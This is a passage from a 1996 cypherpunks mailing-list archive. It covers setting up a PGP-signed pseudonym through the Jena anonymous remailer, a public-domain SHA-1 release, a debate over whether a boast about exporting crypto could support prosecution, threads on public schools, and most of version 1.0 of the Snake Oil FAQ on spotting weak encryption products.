in PGP one simply enters > > pseudonym > > ...with no quotes or address ("pseudonym" ). Exactly. Just the pseudonym. Remember that at this point, you do not know what your pseudonymous address will be, because the keys have not been generated. > w> * Subject: (or Anon-Subject:) [deletia] > The header fields in parens are identical in function or not? Yes, identical in function. To: bill at macrosquash.com is the same as Anon-To: bill at macrosquash.com > w> - Run 'pgp -esa -u "pseudonym" anon at as-node anonid.asc' to sign and > w> encrypt the extracted key for the server. > > These various command lines in the helpfile do not work in the pre-legal > PGP 2.6/uix/ui versions preferred by many, though equivalent command > lines of course exist. I use PGP 2.6.2 as distributed by MIT. The command line in my re-written help file works for my copy of PGP. The command line in the original help file appearantly works for the international edition, although I am not able to confirm this. > The procedure didn't produce results for me so far, but before trying > again I wish to get confirmation that I am trying properly: > 1: Generate key with simple, one-word pseudonym, no quotes, no > address, no nothing. Multiple words work fine, but yes, that should be fine. > 2: Generate -kxa keyfile, pseudo.asc > > 3: -esa encrypt keyfile with Jenaer Remailer's PGP key and send > to anon at as-node.jena.thur.de via a remailer. Yes, that is correct -- be sure that you are signing with your nym's key, and not your own. Also be sure that the remailers you are using are functional. > 4: Account is automatically established and should work > immediately. As soon as the mail arrives, that is correct. If it was lost by using a non-operational remailer, or by sending a misformatted mail, then it will not. > To test... > > 1: Prepare message textfile according to sample: > > Newsgroups: de.test > Subject: Test > > This is the test message textbody... Correct. All of this should be starting at column 0, with no indentation. > 2: PGP encrypt the filebody and two header lines with the Jenaer > Remailer's key using the -esa command, signing the cyphertext > with your key previously sent to the remailer. > > 3: Send the resulting cyphertext message to the Jenaer Remailer > via another remailer, making sure to avoid command words in > the Subject: field of the outgoing message. > > As I say, following these protocols I have not yet seen a resulting > message in the test group I have chosen. Do you feel this is due to > lag, or am I doing something obviously wrong? It may be lag, it may not be. I recommend that you create a test nym, with minimal anonymity (no remailers, send everything directly to jena) and, after waiting several hours to ensure that the key was added, send a mail from your nym to your own account. If you get no mail after several hours, something is wrong. > w> - Never request a delivery to your real Email address. > > So here's what I really want to know: When/if the new account is up and > running, how _does_ one discreetly retrieve his mail? I don't see how, > other than to have it sent to alt.anonymous.messages via a mail2news > netmail address such as alt.anonymous.messages at news.demon.co.uk and then > pick through the mess there until some cyphertext message responds to > his right key. That's exactly right. We need better message pools. Actually, what is needed is a email message pool, because of the lag and uncertainly of Usenet. But that's a project for another day. hth. -- William Ono PGP Key: F3F716BD fingerprint = A8 0D B9 0F 40 A7 D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint PGP-encrypted mail welcome! "640k ought to be enough for everybody." From steve at edmweb.com Fri Sep 27 19:43:47 1996 From: steve at edmweb.com (Steve Reid) Date: Sat, 28 Sep 1996 10:43:47 +0800 Subject: Public domain SHA-1 in C Message-ID: Thanks to Eric Young's suggestions, my SHA-1 is now _very_ fast. If you downloaded the older version (before 5:30pm Pacific time) you'll probably want to download the new-and-improved version. http://www.edmweb.com/steve/sha1.c ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) From unicorn at schloss.li Fri Sep 27 20:17:56 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 11:17:56 +0800 Subject: LivePGP (fwd) In-Reply-To: <199609271533.KAA08175@homeport.org> Message-ID: On Fri, 27 Sep 1996, Adam Shostack wrote: > ----- Edited message from Ming-Ching Tiew ----- > > >From mctiew at csi.po.my Thu Sep 26 22:36:39 1996 > Message-ID: <01BBAC57.C7351E60 at minuet> > From: Ming-Ching Tiew > To: "'Adam Shostack'" > Subject: RE: LivePGP > Date: Fri, 27 Sep 1996 09:39:21 +-800 > Encoding: 38 TEXT > > > > Do you already have this information ? > > http://www.vv.com.au/vv/resources/security/livepgp/README.html > > The copy is expiring soon. I will soon be releasing a new copy which is > much for polished. > > I am not releasing the source. Then I am not using the software. > > > ----- End of forwarded message from Ming-Ching Tiew ----- > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From craigw at dg.ce.com.au Fri Sep 27 20:18:32 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Sat, 28 Sep 1996 11:18:32 +0800 Subject: VCRS and Crypto Message-ID: <199609280123.LAA15458@mac.ce.com.au> If the average person cared about quality rather than what is marketed as bestand the must have, we might have laser disk instead of video rental stores. Also, where would M$ be > >Remember the VHS/Beta VCR wars? With a fairly equal market in about 1978, > >Beta died 10 years later because the market couldn't support two > >incompatible standards. It wasn't that one was dramatically better than the > >other, it was simply that having two standards forced the market to > >duplicate stocks, for the machines as well as tapes, particularly > >pre-recorded tapes. Notice, however, that VCR's are relatively "isolated": > >It doesn't really matter if you have one format and your neighbor has > >another, unless you want to swap tapes. But crypto telephones inherently > >require (in the long term) full intercompability. If you didn't have that, > >there'd be half a world of people you couldn't call! > ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dthorn at gte.net Fri Sep 27 20:22:31 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 28 Sep 1996 11:22:31 +0800 Subject: Public Schools In-Reply-To: Message-ID: <324C7C95.3A79@gte.net> Timothy C. May wrote: > At 9:22 AM -0400 9/27/96, ronsimpson wrote: > >I hate to burst any bubbles but, the school with the highest number > >of National Merit Finalists and highest number of 1600 SATs is a > >Public High School (Jefferson High in Fairfax, VA) > I took some of my science classes at Jefferson. > Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS. > Help me before it's too late. > (Seriously, my view is that schools are not very important. All > success, academic or technical, derives from one basic determining > factor: those who read for pleasure, succeed, and those who don't read > for pleasure, don't. The young child who reads will usually keep > reading, whether novels, encyclopedias, lists like this, etc. The > child who is not into reading will likely never get into it later in > life. Which is OK, as there is a serious > shortage of tradesmen, at least in my area, and more kids ought to be > taught usable trades. Seriously. Our "ideal" that all children should > attend college is absurd, given the lack of academic preparation, > desire, and reading skills that so many high school students lack. > Most community > colleges are essentially becoming Grades 13-14, with most of the Grade > 13-14 students reading at the 9th-grade level (which most of us on > this list were reading at when we were in the 7th-grade, or earlier).) On the "ideal that all children should attend college": I grew up in Ohio and went to school in the 1950's. College was a luxury, or necessary only for professional jobs (doctor, etc). There was no Ohio income tax, and no state lottery, both of which were instituted (in the 1970's) at least partly on the premise of helping schools. I don't have to elaborate on where the money went, right? But, if you are suggesting seriously that one of the greatest money scams of all time, which involves not only moving pay-for-school to the masses (i.e., requiring college for nearly everyone), but makes indentured servants out of most of the people who get a serious degree, well, you're up against the big bucks on that one. From dlv at bwalk.dm.com Fri Sep 27 20:35:24 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 28 Sep 1996 11:35:24 +0800 Subject: Possible subs attack???? In-Reply-To: <843834821.2722.0@fatmans.demon.co.uk> Message-ID: The lying sack of shit Timmy May writes: > > whose list is this, and why am I on it? Please delete my name > > now. > > I have noticed a lot of these messages on the list over the last day > or two, I can only assume Vilus/Detweiller/Some other troublemaker > has decided to subscribe a few people using fake return addresses, > anyone else got any ideas on what else could have caused people to be > subscribed? The lying sack of shit Timmy May lies again, as usual. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Fri Sep 27 20:39:20 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 28 Sep 1996 11:39:20 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: At 5:43 PM -0400 9/27/96, Black Unicorn wrote: >On Thu, 26 Sep 1996, Timothy C. May wrote: >His admission that he used the notebook. Recovering the notebook and >finding the software. Interviewing the Customs agent working at the time. His admission that he used _which_ notebook? Chain of evidence again. Finding _which_ software? (As for the Customs agent, I can assure you that my luggage has never been checked upon either leaving the U.S. or entering the U.S. Even if U.S. Customs could figure out who was working at the time I putatively entered the country, and even if he remembered _me_, months later, just what records would he have, and how would they stand up in court?) Hearing me say I "exported crypto," a hearsay claim, and happening to find one or more laptops at my home, weeks or months later, implies nothing. (To make the point graphically, suppose the raiding party finds _several_ laptops or notebooks...do they assume _all_ were taken out of the country, or do they pick the one with the most incriminating software on it? Answer: Unless they can _prove_ one of them was used, and that it had not been _changed_ since the putative event (highly unlikely), they cannot simply _assume_ one of them was taken out. (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? So? I installed it last week. My trip to Europe was last summer.") >Considering the headaches required for airline travel today, it's not like >there aren't serious records abound. Such as? I recall no inspections of my luggage, no inventorying of the serial numbers of my laptops, no inspection whatsoever of my magneto-optical drives (which were in my carry-on luggage, and not even glanced at, in the box they were in). X-rays would not prove what was taken in or out of the country, even if "x-ray escrow" were implemented (which it is not, according to all reports I have heard, and based on some practical limits on storage), I doubt the records of a trip, say, last summer (of '95) could be retrieved and prove that a particular laptop was taken out. Not to mention that the software allegedly taken out might have been on any kind of media, none of them distinguishable with an x-ray machine. >For crying outloud, he admitted to the world that he took the software >out. I put that in front of a jury and it looks just like the typical "For crying out loud" is bluster, not legal argument. >stupid bragging criminal. Any defense about "I was just kidding" or "The >message was forged" might be interesting, but it will sound like >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a Legal proof is still needed. Given only a nebulous statement like "I exported crypto in violation of the ITARs," or "I shipped PGP to Europe," is not enough for a case even to be brought to trial. (If it reached trial, I would expect a defense attorney to move for dismissal. Absent any evidence that a crime occurred, absent any proof beyond the nebulous hearsay statement of a "braggart," there is simply no basis for criminal action.) "Stupid bragging criminals" may be common, but bragging is not in and of itself illegal. There still has to be evidence of a crime. "Produce the body." (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the body, or witnesses, does this mean I'll be found guilty? To use BU's phrasing, "for crying out loud.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From snow at smoke.suba.com Fri Sep 27 21:03:09 1996 From: snow at smoke.suba.com (snow) Date: Sat, 28 Sep 1996 12:03:09 +0800 Subject: Public Schools In-Reply-To: <9608278438.AA843856542@smtplink.alis.ca> Message-ID: <199609280109.UAA00349@smoke.suba.com> James said: > ronsimpson at unidial.com wrote: > >I hate to burst any bubbles but, the school with the highest number > > of National Merit Finalists and highest number of 1600 SATs is a=20 > > Public High School (Jefferson High in Fairfax, VA) > The same is true for Montreal (Royal Vale) using the equivalent scoring methods. > But there are public schools at both extremes of the curve. > While it is true that Private Schools would not survive due to market forces if > they did consistently poorly, it is also true that they filter their incoming > student body in a manner that Public Schools can not. > If you want to refuse those who are too stupid or anti-social from Public > Schools in order to improve the social or intellectual climate, you better have > a solution for the resulting cast-offs. There is a solution. Trade Schools, and Parental Envolvement. It could very well be (and if I had the money I'd make the bet) that _many_ of the "troubled" youth of today are simply undisiplined. (Fortunately, most of them couldn't afford to bet against their parents in an AP world). It would also seem to follow that if parents were spending their own money (or perceived it as their own money) that they would take a greater interest in their childrens education. For those that are truly not scholastically oreinted, there would be trade schools. I would also bet that you could teach a child everything they need to learn (other than a trade) to cope in this world in about 4 years. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From cmcurtin at research.megasoft.com Fri Sep 27 21:06:23 1996 From: cmcurtin at research.megasoft.com (C Matthew Curtin) Date: Sat, 28 Sep 1996 12:06:23 +0800 Subject: Snake Oil FAQ 1.0 Message-ID: <199609272313.TAA00656@goffette.research.megasoft.com> Obviously, there's still work to be done, but that's why there are numbers higher than 1.0, right? :-) -matt URL: http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html Version: 1.0 Archive-name: cryptography-faq/snake-oil Posting-Frequency: monthly Snake-Oil Warning Signs Encryption Software to Avoid Copyright � 1996 Matt Curtin $Id: snake-oil-faq.html,v 1.0 1996/09/27 21:15:04 cmcurtin Exp $ Distribution Distribution of this document is unlimited. We're specifically interested in reaching people making decisions about what sorts of crypto to use (if any at all), both for their organizations and for themselves, especially those who are non-experts in the field of cryptography and security. This is a work-in-progress. Feedback is greatly appreciated. The Snake Oil FAQ is posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, comp.answers, and comp.infosystems. Disclaimer All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves. This is a compilation things that are common among snake oil vendors. It cannot be the sole metric by which a security product is rated, since there can be exceptions to most (or all?) of these rules. (But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil. From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some braindead marketing technique, so be aware that exceptions to general rules can exist.) Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, Matt Curtin History With the rise in the number of crypto products becoming available came a rise in the amount of ineffective or outright bogus products. After some discussion about this on the cypherpunks list, Robert Rothenburg wrote the first iteration of the Snake Oil FAQ. Matt Curtin took the early text and munged it into its current state with the help of the listed contributors (and probably some others whose names have inadvertently missed. Sorry in advance, if this is the case.) Introduction This really isn't much of a "FAQ" in the sense that one generally expects to see them: in a question and answer format. Perhaps it will be rewritten as such in the future, but currently, it is more traditionally-formatted paper that covers many topics that are the subject of frequently asked questions. Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security. Why "snake oil?" The term is used in many fields to denote something that is sold without consideration of its quality, or its ability to live up to claims made by its vendor. This term originally applied to that sold in traveling medicine shows, where the salesmen would claim their elixer would cure just about any ailment that a potential customer could have. Listening to some of the claims made some by modern day crypto vendors, "snake oil" is a surprisingly apt name. Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. The purpose of this document is to present some obvious "red flags" that people unfamiliar with the nuts and bolts of cryptography can use as a guideline for determining whether they're dealing with snake oil or the Real Thing. For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil". When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that supports strong encryption? An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years? Is the third party someone's kid sister? An individual? A corporation? A government? Beware of products that are designed for a specific task (such as data archiving, for example), and add encryption in as an additional feature. Typically, it's better to use an encryption utility for encryption, rather than some tool designed for another purpose that adds encryption to its list of features. Some basics The cryptography-faq (found at http://www.cis.ohio-state.edu/hypertext/faq/usenet/cryptography-faq/top.html) is a more general tutorial of cryptography, and should also be consulted. In an effort to make this FAQ more complete, some very basic topics are included below. Conventional vs. Public Key Cryptography There are two basic types of cryptosystems: symmetric (also known as "conventional," sometimes also called "secret key") and asymmetric ("public key.") Symmetric ciphers require both the sender and the recipient to have the same key. That key is applied to encrypt the data by the sender, and again by the recipient to decrypt the data. The problem here is getting the sender and recipient to share the key. Asymmetric ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets (and verifies!) Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses his private key to decrypt the message. Secrecy vs Integrity: What are you trying to protect? For many users of computer based crypto, preserving the contents of a message is as important as as protecting its secrecy. Damage caused by a modified message can often be worse than that caused by its disclosure. For example, it may be disquieting to discover that a hacker has read the contents of your funds transfer authorization, but it's a disaster for him to change the transfer destination to his own account. Encryption by itself does not protect a message from change. In fact, there are several techniques for changing the contents of an encrypted message without ever figuring out the encryption key. If the integrity of your messages is important, don't just rely on secrecy to protect them. Check the vendor's claims for an explanation of how their product protects the message from undetected modification. The verification of public keys is an important step. Failure to verify Bob's public key leaves open the possibility that Alice is sending her secrets to someone else, who simply claims to be Bob, using a key that has Bob's name on it, but whose associated private key is in the hands of an attacker. Asymmetric ciphers are much slower than their symmetric counterparts. Also, key sizes must be much larger. See the cryptography FAQ for a more detailed discussion of these topics. Key Sizes Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small key sizes and increasing processor speeds (making a brute-force attacks - trying every possible key - feasible). The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one. Having stated the above, it is important to note that a common feature of snake oil is to have large keys. Often, the claimed key lengths are much longer than what is practical, usually due to the vendor's confusion between symmetric and asymmetric cipher key length requirements. (For example, a vendor who claims to use a strong symmetric cipher with a 2048 bit key is probably lacking some basic understanding of key length requirements, and requisite computing power for performing various functions with the keys in question.) In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay. This is included so the reader will be able to get a reasonable idea of symmetric key length requirements, and have some sort of a guideline for determining whether the key length of the product he's interested in even makes sense.) The following chart appears in [1]. Security Requirements for Different Information Type of Traffic Lifetime Minimum [Symmetric] Key Length Tactical military information minutes/hours 56-64 bits Product announcements, mergers, interest rates days/weeks 64 bits Long-term business plans years 64 bits Trade secrets (e.g., recipe for Coca-Cola) decades 112 bits H-bomb secrets >40 years 128 bits Identities of spies >50 years 128 bits Personal affairs >50 years 128 bits Diplomatic embarrassments >65 years at least 128 bits U.S. Census data 100 years at least 128 bits As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from [1]. (Due to differences between symmetric and asymmetric algorithms, key length comparisons between the two is difficult. The following is intended to give the reader just a general idea of what is roughly comparable, in order to be able to weed out claims of security of, for example, ciphers with 100-bit asymmetric keys.) Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks* Symmetric Key Length Public-key Key Length 56 bits 384 bits 64 bits 512 bits 80 bits 768 bits 112 bits 1792 bits 128 bits 2304 bits *These key sizes are for public key cryptosystems based on the problem of factoring large integers, and apply to a number of ciphers based on the discrete log problem (difficulty of taking logarithms in a finite field.) A variation of the discrete log problem (known as Elliptic Curve Discrete Logarithm Problem), where the cryptosystem is based on computations on points of an elliptic curve over a finite field, for example, has been shown to be resistant to brute-force attacks with much smaller keys than other discrete log problem-based ciphers. Ciphers based different problems have different key size requirements. Each type of algorithm's key size requirements depend on the mathematical problem on which the system is based. So, it's important to find out what algorithm (or at least mathematical problem the algorithm uses) and key size is used. One without the other is meaningless. Implementation Environment Other factors that can influence the relative security of a product are related to its environment. For example, in software-based encryption packages, is there any plaintext that's written to disk (perhaps in temporary files)? What about operating systems that have the ability to swap processes out of memory on to disk? When something to be encrypted has its plaintext counterpart deleted, is the extent of its deletion a standard removal of its name from the directory contents, or has it been written over? If it's been written over, how well has it been written over? Is that level of security an issue for you? Are you storing cryptographic keys on a multi-user machine? The likelihood of having your keys illicitly accessed is much higher, if so. It's important to consider such things when trying to decide how secure something you implement is (or isn't) going to be. Some Common Snake-Oil Warning Signs The following are some of the "red flags" one should watch for when examining an encryption product * Technobabble The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology). Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either. A sign of technobabble is a description which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in literature about cryptology. Further, if the marketing material isn't clear, what reason is there to believe that the instructions are any better? Even the greatest of products, if not used properly, can be rendered useless. If you can't understand what a vendor is saying, you're most likely better off finding something that makes more sense. * New Type of Cryptography? Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new breakthroughs" are likely to show up in the research literature, and professionals in the field are typically won't trust them until after years of analysis, by which time they are not so new anymore. Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses a different method of computation doesn't make it more secure. (As a matter of fact, these techniques are the subject of ongoing cryptographic research and nobody has published successful results based on their use yet.) Anything whose authors claim to have invented a new public key cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography is grounded in mathematical theory. The security is based on problems that are known (or widely believed) to be hard to solve. It's important to understand the difference between a new algorithm or cipher and a new product. Engaging in the practice of developing ciphers and cryptographic products is a fine thing to do. However, to do both, at the same time, is foolish. Many snake oil vendors brag about how they do this, despite the lack of wisdom in such activity. The strength of any encryption scheme is only proven by the test of time. New crypto is like new pharmaceuticals, not new cars. In some ways, though, it's worse: if some pharmaceutical company has some bogus stuff out there, people will start getting really sick. If you're using bogus crypto, you likely won't have any idea that your secrets aren't as secret as you think. * Secret Algorithms Avoid software which uses secret algorithms. Security through obscurity is not considered a safe means of protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the academic and professional crypto community, then you should be wary of trusting it. (Note that a vendor who specializes in cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception. On the other hand, if you don't know which vendors are and aren't reputable, you can't take their words for it. You're typically best off avoiding that which is secret.) Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher. The use of a trusted algorithm, with technical notes explaining the implementation (or better yet, availability of the source code for the product itself) are signs that a vendor is confident about their product's security. You can take the implementation apart and test it yourself. A lock where attackers can see the internal mechanisms, and still not be able to break it is a strong lock, indeed. A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem. (If a hypothetical 'hacker' was able to get access you your system, access to encrypted data might be the least of your problems.) * Experienced Security Experts and Rave Reviews Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal). Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) to take the software apart for them. Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either. * Unbreakability Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims. (If it sounds too good to be true, it probably is.) No algorithm is unbreakable. Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power. One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion. Some companies that claim "unbreakability" actually have serious reasons for saying so. Unfortunately, these reasons will generally turn out to depend on some narrow definition of what it means to "break" their security. For example, true one time pads are technically "unbreakable" as far as secrecy goes, but only if several difficult and important conditions also hold. Even then, they are trivially vulnerable to known plaintext attacks on the message's integrity. Other systems may be "unbreakable" only until one of the communicating devices (a laptop, for example) is stolen. So, be sure to find out exactly what the "unbreakable" properties of the system are, and decide if the more breakable portions also provide adequate security. Often, less experienced vendor representatives will roll their eyes and say, "Of course it's not unbreakable if you do such-and-such." The point is that the exact nature of "such and such" will vary from one product to another. Pick the one that matches your operational needs the best. * One-Time-Pads A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. (Technically, OTP-generated ciphertext has an equal chance of being each possible plaintext. For example, "598v *$ _+~xCtMB0" has equal probabilities of decrypting to "the whole year in", "the hole youre in", and "you are a weenie!") Snake-oil sellers will try to capitalize on the known strength of an OTP. It is important to understand that any variation in the implementation (which is often done to get around the inherent key management problems of OTPs) means that it is not an OTP, and has nowhere near the security of an OTP. An OTP system is not an algorithm. It works by having a "pad" (called such because originally paper pads were used, before general-purpose computers came into being) of random bits in the possession of both the sender and recipient, but absolutely no one else. (The pad must be sent from one to the other securely, such as in a locked briefcase handcuffed to the carrier, and that sort of thing.) The message is encrypted using the next n bits in the pad as they key, where n is the number of bits in the message. After the bits are used from the pad, they're destroyed, and can never again be used. The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad. Further, if the keys (i.e., random bit "pads") are provided by the vendor, the quality of these cannot be verified. How do you know that they aren't sending the same bits (or some trivial mutation thereof) to everyone? Or keeping a copy for themselves? Or selling a copy to your competitors or enemies? OTPs are highly impractical for general purpose cryptography, since the need for random bits is very high, and key management is so cumbersome. OTPs are only practical for extremely low bandwidth communication channels where two parties have the means to exchange pads through a different method from that of their messages. (It is rumored that a link from Washington, D.C., to Moscow was (is?) encrypted with an OTP.) A lesson from the VENONA project (see NSA's web site) is that OTPs are seriously vulnerable if a pad is ever reused. It does not take the resources of a government agency to crack a reused pad. Therefore, the real limitation to their practical use is the generation and distribution of truly random keys for them. You have to distribute at least one bit of key for every bit of data transmitted, including any encrypted protocol data that's sent. If you reuse your pads you run the risk of compromising all data sent with the reused pad. The vendor might (or might try to) confuse random session keys or initialization vectors with OTPs. * Algorithm or product XXX is insecure Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these. These usually involve either trying every possible combination of bits for form keys, and trying every possible key until a solution is found, factoring large numbers, or some other cryptanalysis that's just as computationally intensive as one of these methods. * Keys and Passwords The "key" and the "password" are not the same thing. The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization"). The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys. It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure. If the system limits the size of the key or passphrase to something that seems too low, it probably is. If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it. If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product. Convenience is nice, but be wary of anything that puts too much emphasis on ease of use, without due consideration to cryptographic strength. Avoid anything that lets anyone with your copy of the software to access files, data, etc. without having to use some sort of key or passphrase. Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy). Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and secret-key (symmetric) cryptography. * Lost keys and passwords If the vendor (or a third party) claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it: a flaw is obviously present, and used to retrieve the contents of an encrypted message. If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key? (Is someone else able to recover your key as easily as you can?) Remember, you have no security against someone who has your key. * Exportable from the USA If the software is made in the US, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export). If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art. (For example, if someone claims that the IDEA cipher is exportable from the US, while most other vendors (or the State Department!) do not make such assertions, they're probably lacking sufficient clue to provide you with strong cryptographic software.) Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution. (Of course, a freely exportable version isn't secure, since it probably just uses a much smaller key, one that could be easily broken.) Also note that just because software has made it outside of the US does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site. There are no restrictions on importing crypto products into the US, so a foreign vendor can legally offer a single, secure version of a product for the entire world. * "Military Grade" Encryption Many crypto vendors claim their solution is "military grade." This is a term with no real meaning, since there isn't a real metric by which something can be judged "military grade," except for it to be actually used by various armed forces. Since they don't reveal what they're using, it's neither possible to prove nor to disprove something as being "military grade." Some good crypto products unfortunately also use this term. (Watch for this one especially in combination with other snake oil indicators, i.e., "our military grade encryption system is exportable from the US!") Other Considerations Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use). No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly. Do not trust any product to be foolproof, and be wary of any product that claims it is. Glossary algorithm A procedure or mathematical formula. Cryptographic algorithms convert plaintext to and from ciphertext. cipher Synonym for "cryptographic algorithm" cryptanalysis To solve or "break" a cryptosystem. escrow A third party able to decrypt messages sent from one person to another. Although this term is often used in connection with the US Government's "Clipper" proposals, it isn't limited to government-mandated ability to access encrypted information at will. Some corporations might wish to have their employees use cryptosystems with escrow features when conducting the company's business, so the information can be retrieved should the employee be unable to unlock it himself later, (if he were to forget his passphrase, suddenly quit, get run over by a bus, etc.) Or, someone might wish his spouse or lawyer to be able to recover encrypted data, etc., in which case he could use a cryptosystem with an escrow feature. initialization One of the problems with encrypting such things as files vector in specific formats (i.e., that of a word processor, email, etc.) is that there is a high degree of predictability about the first bytes of the message. This could be used to break the encrypted message easier than by brute force. In ciphers where one block of data is used to influence the ciphertext of the next (such as CBC), a random block of data is encrypted and used as the first block of the 